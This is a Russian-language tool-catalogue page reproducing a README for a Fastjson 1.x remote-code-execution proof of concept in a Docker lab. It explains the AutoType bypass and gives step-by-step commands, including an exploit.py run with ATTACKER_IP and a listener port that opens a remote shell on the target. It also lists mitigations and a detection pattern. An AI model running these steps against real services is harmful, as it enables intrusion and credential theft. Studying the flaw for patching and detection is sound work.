Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-16723 — PoC-эксплойт для Fastjson RCE (CVE-2026-16723) с автоматической генерацией JAR-пейлоада и его доставкой через специально сформированный JSON в обход ограничений AutoType. | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2026-16723
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

PoC-эксплойт для Fastjson RCE (CVE-2026-16723) с автоматической генерацией JAR-пейлоада и его доставкой через специально сформированный JSON в обход ограничений AutoType.

Репозиторий
161 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Обзор

CVE-2026-16723 — это уязвимость удаленного выполнения кода (RCE) в Fastjson 1.x (1.2.68 – 1.2.83). Когда Fastjson разбирает JSON, контролируемый атакующим, сформированное значение @type превращается в поиск классового ресурса внутри checkAutoType. В исполняемом fat-JAR приложения Spring Boot загрузчик классов разрешает это имя как URL jar:http:// и загружает удаленный JAR (SSRF), а затем загружает класс с аннотацией @JSONType, даже если AutoType отключен. Поскольку современный JDK / Tomcat отвергает бинарное имя jar:http://, надежный вариант помещает JAR в кэш JVM и повторно считывает его через jar:file:/proc/self/fd/N, благодаря чему класс определяется и выполняется его статический инициализатор, что приводит к выполнению кода. AutoType остается отключенным, и никакой classpath-gadget не требуется.


Затронутые версии

КатегорияВерсия
УязвимыеFastjson 1.2.68 ≤ версия ≤ 1.2.83
ИсправленныеПерейти на Fastjson 2.x (исправлений для 1.x не выпущено)

Воздействие

  • Удаленное выполнение кода от имени сервисного аккаунта
  • Раскрытие секретов / учетных данных с хоста и из окружения
  • Полная компрометация затронутого приложения

Окружение

Лабораторная цель — публичный интернет-магазин (Northwind Store), чей поисковый API связывает тело запроса с Fastjson. Всё настроено по умолчанию в Fastjson: SafeMode выключен, AutoType выключен, упаковано как Spring Boot fat-JAR.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
ПредусловиеСостояние в этой лаборатории
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot исполняемый fat-JARда
Путь неаутентифицированного разбора JSONPOST /api/products/search
SafeMode / AutoTypeпо умолчанию (оба выключены)

PoC

Атакующий и цель работают в одной Docker bridge-сети, поэтому цель обращается к атакующему через исходящее соединение (дополнительный порт не публикуется).

Шаг 1. Убедитесь, что цель запущена

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Шаг 2. Запустите эксплойт на машине атакующего

exploit.py собирает payload-JAR, раздает его, запускает слушатель и выводит тело запроса. Требуется только обратный адрес.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Шаг 3. Доставьте payload

Вставьте выведенное тело в search endpoint (Burp Repeater или curl) и отправьте. Поисковый запрос — обычная функция; изменено только его JSON-тело.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Шаг 4. Подтвердите результат

Код выполняется от имени сервисного аккаунта. Получите флаг через полученную оболочку:

root@kitploit:~
whoami

Меры по защите

  • Перейти на Fastjson 2.x
  • Или использовать com.alibaba:fastjson:1.2.83_noneautotype
  • Или запустить JVM с -Dfastjson.parser.safeMode=true
  • Обнаружение: значения JSON @type, содержащие шаблоны jar:http или jar:file / /proc/self/fd

Анализ

  • KR:
  • EN:
Скачать инструмент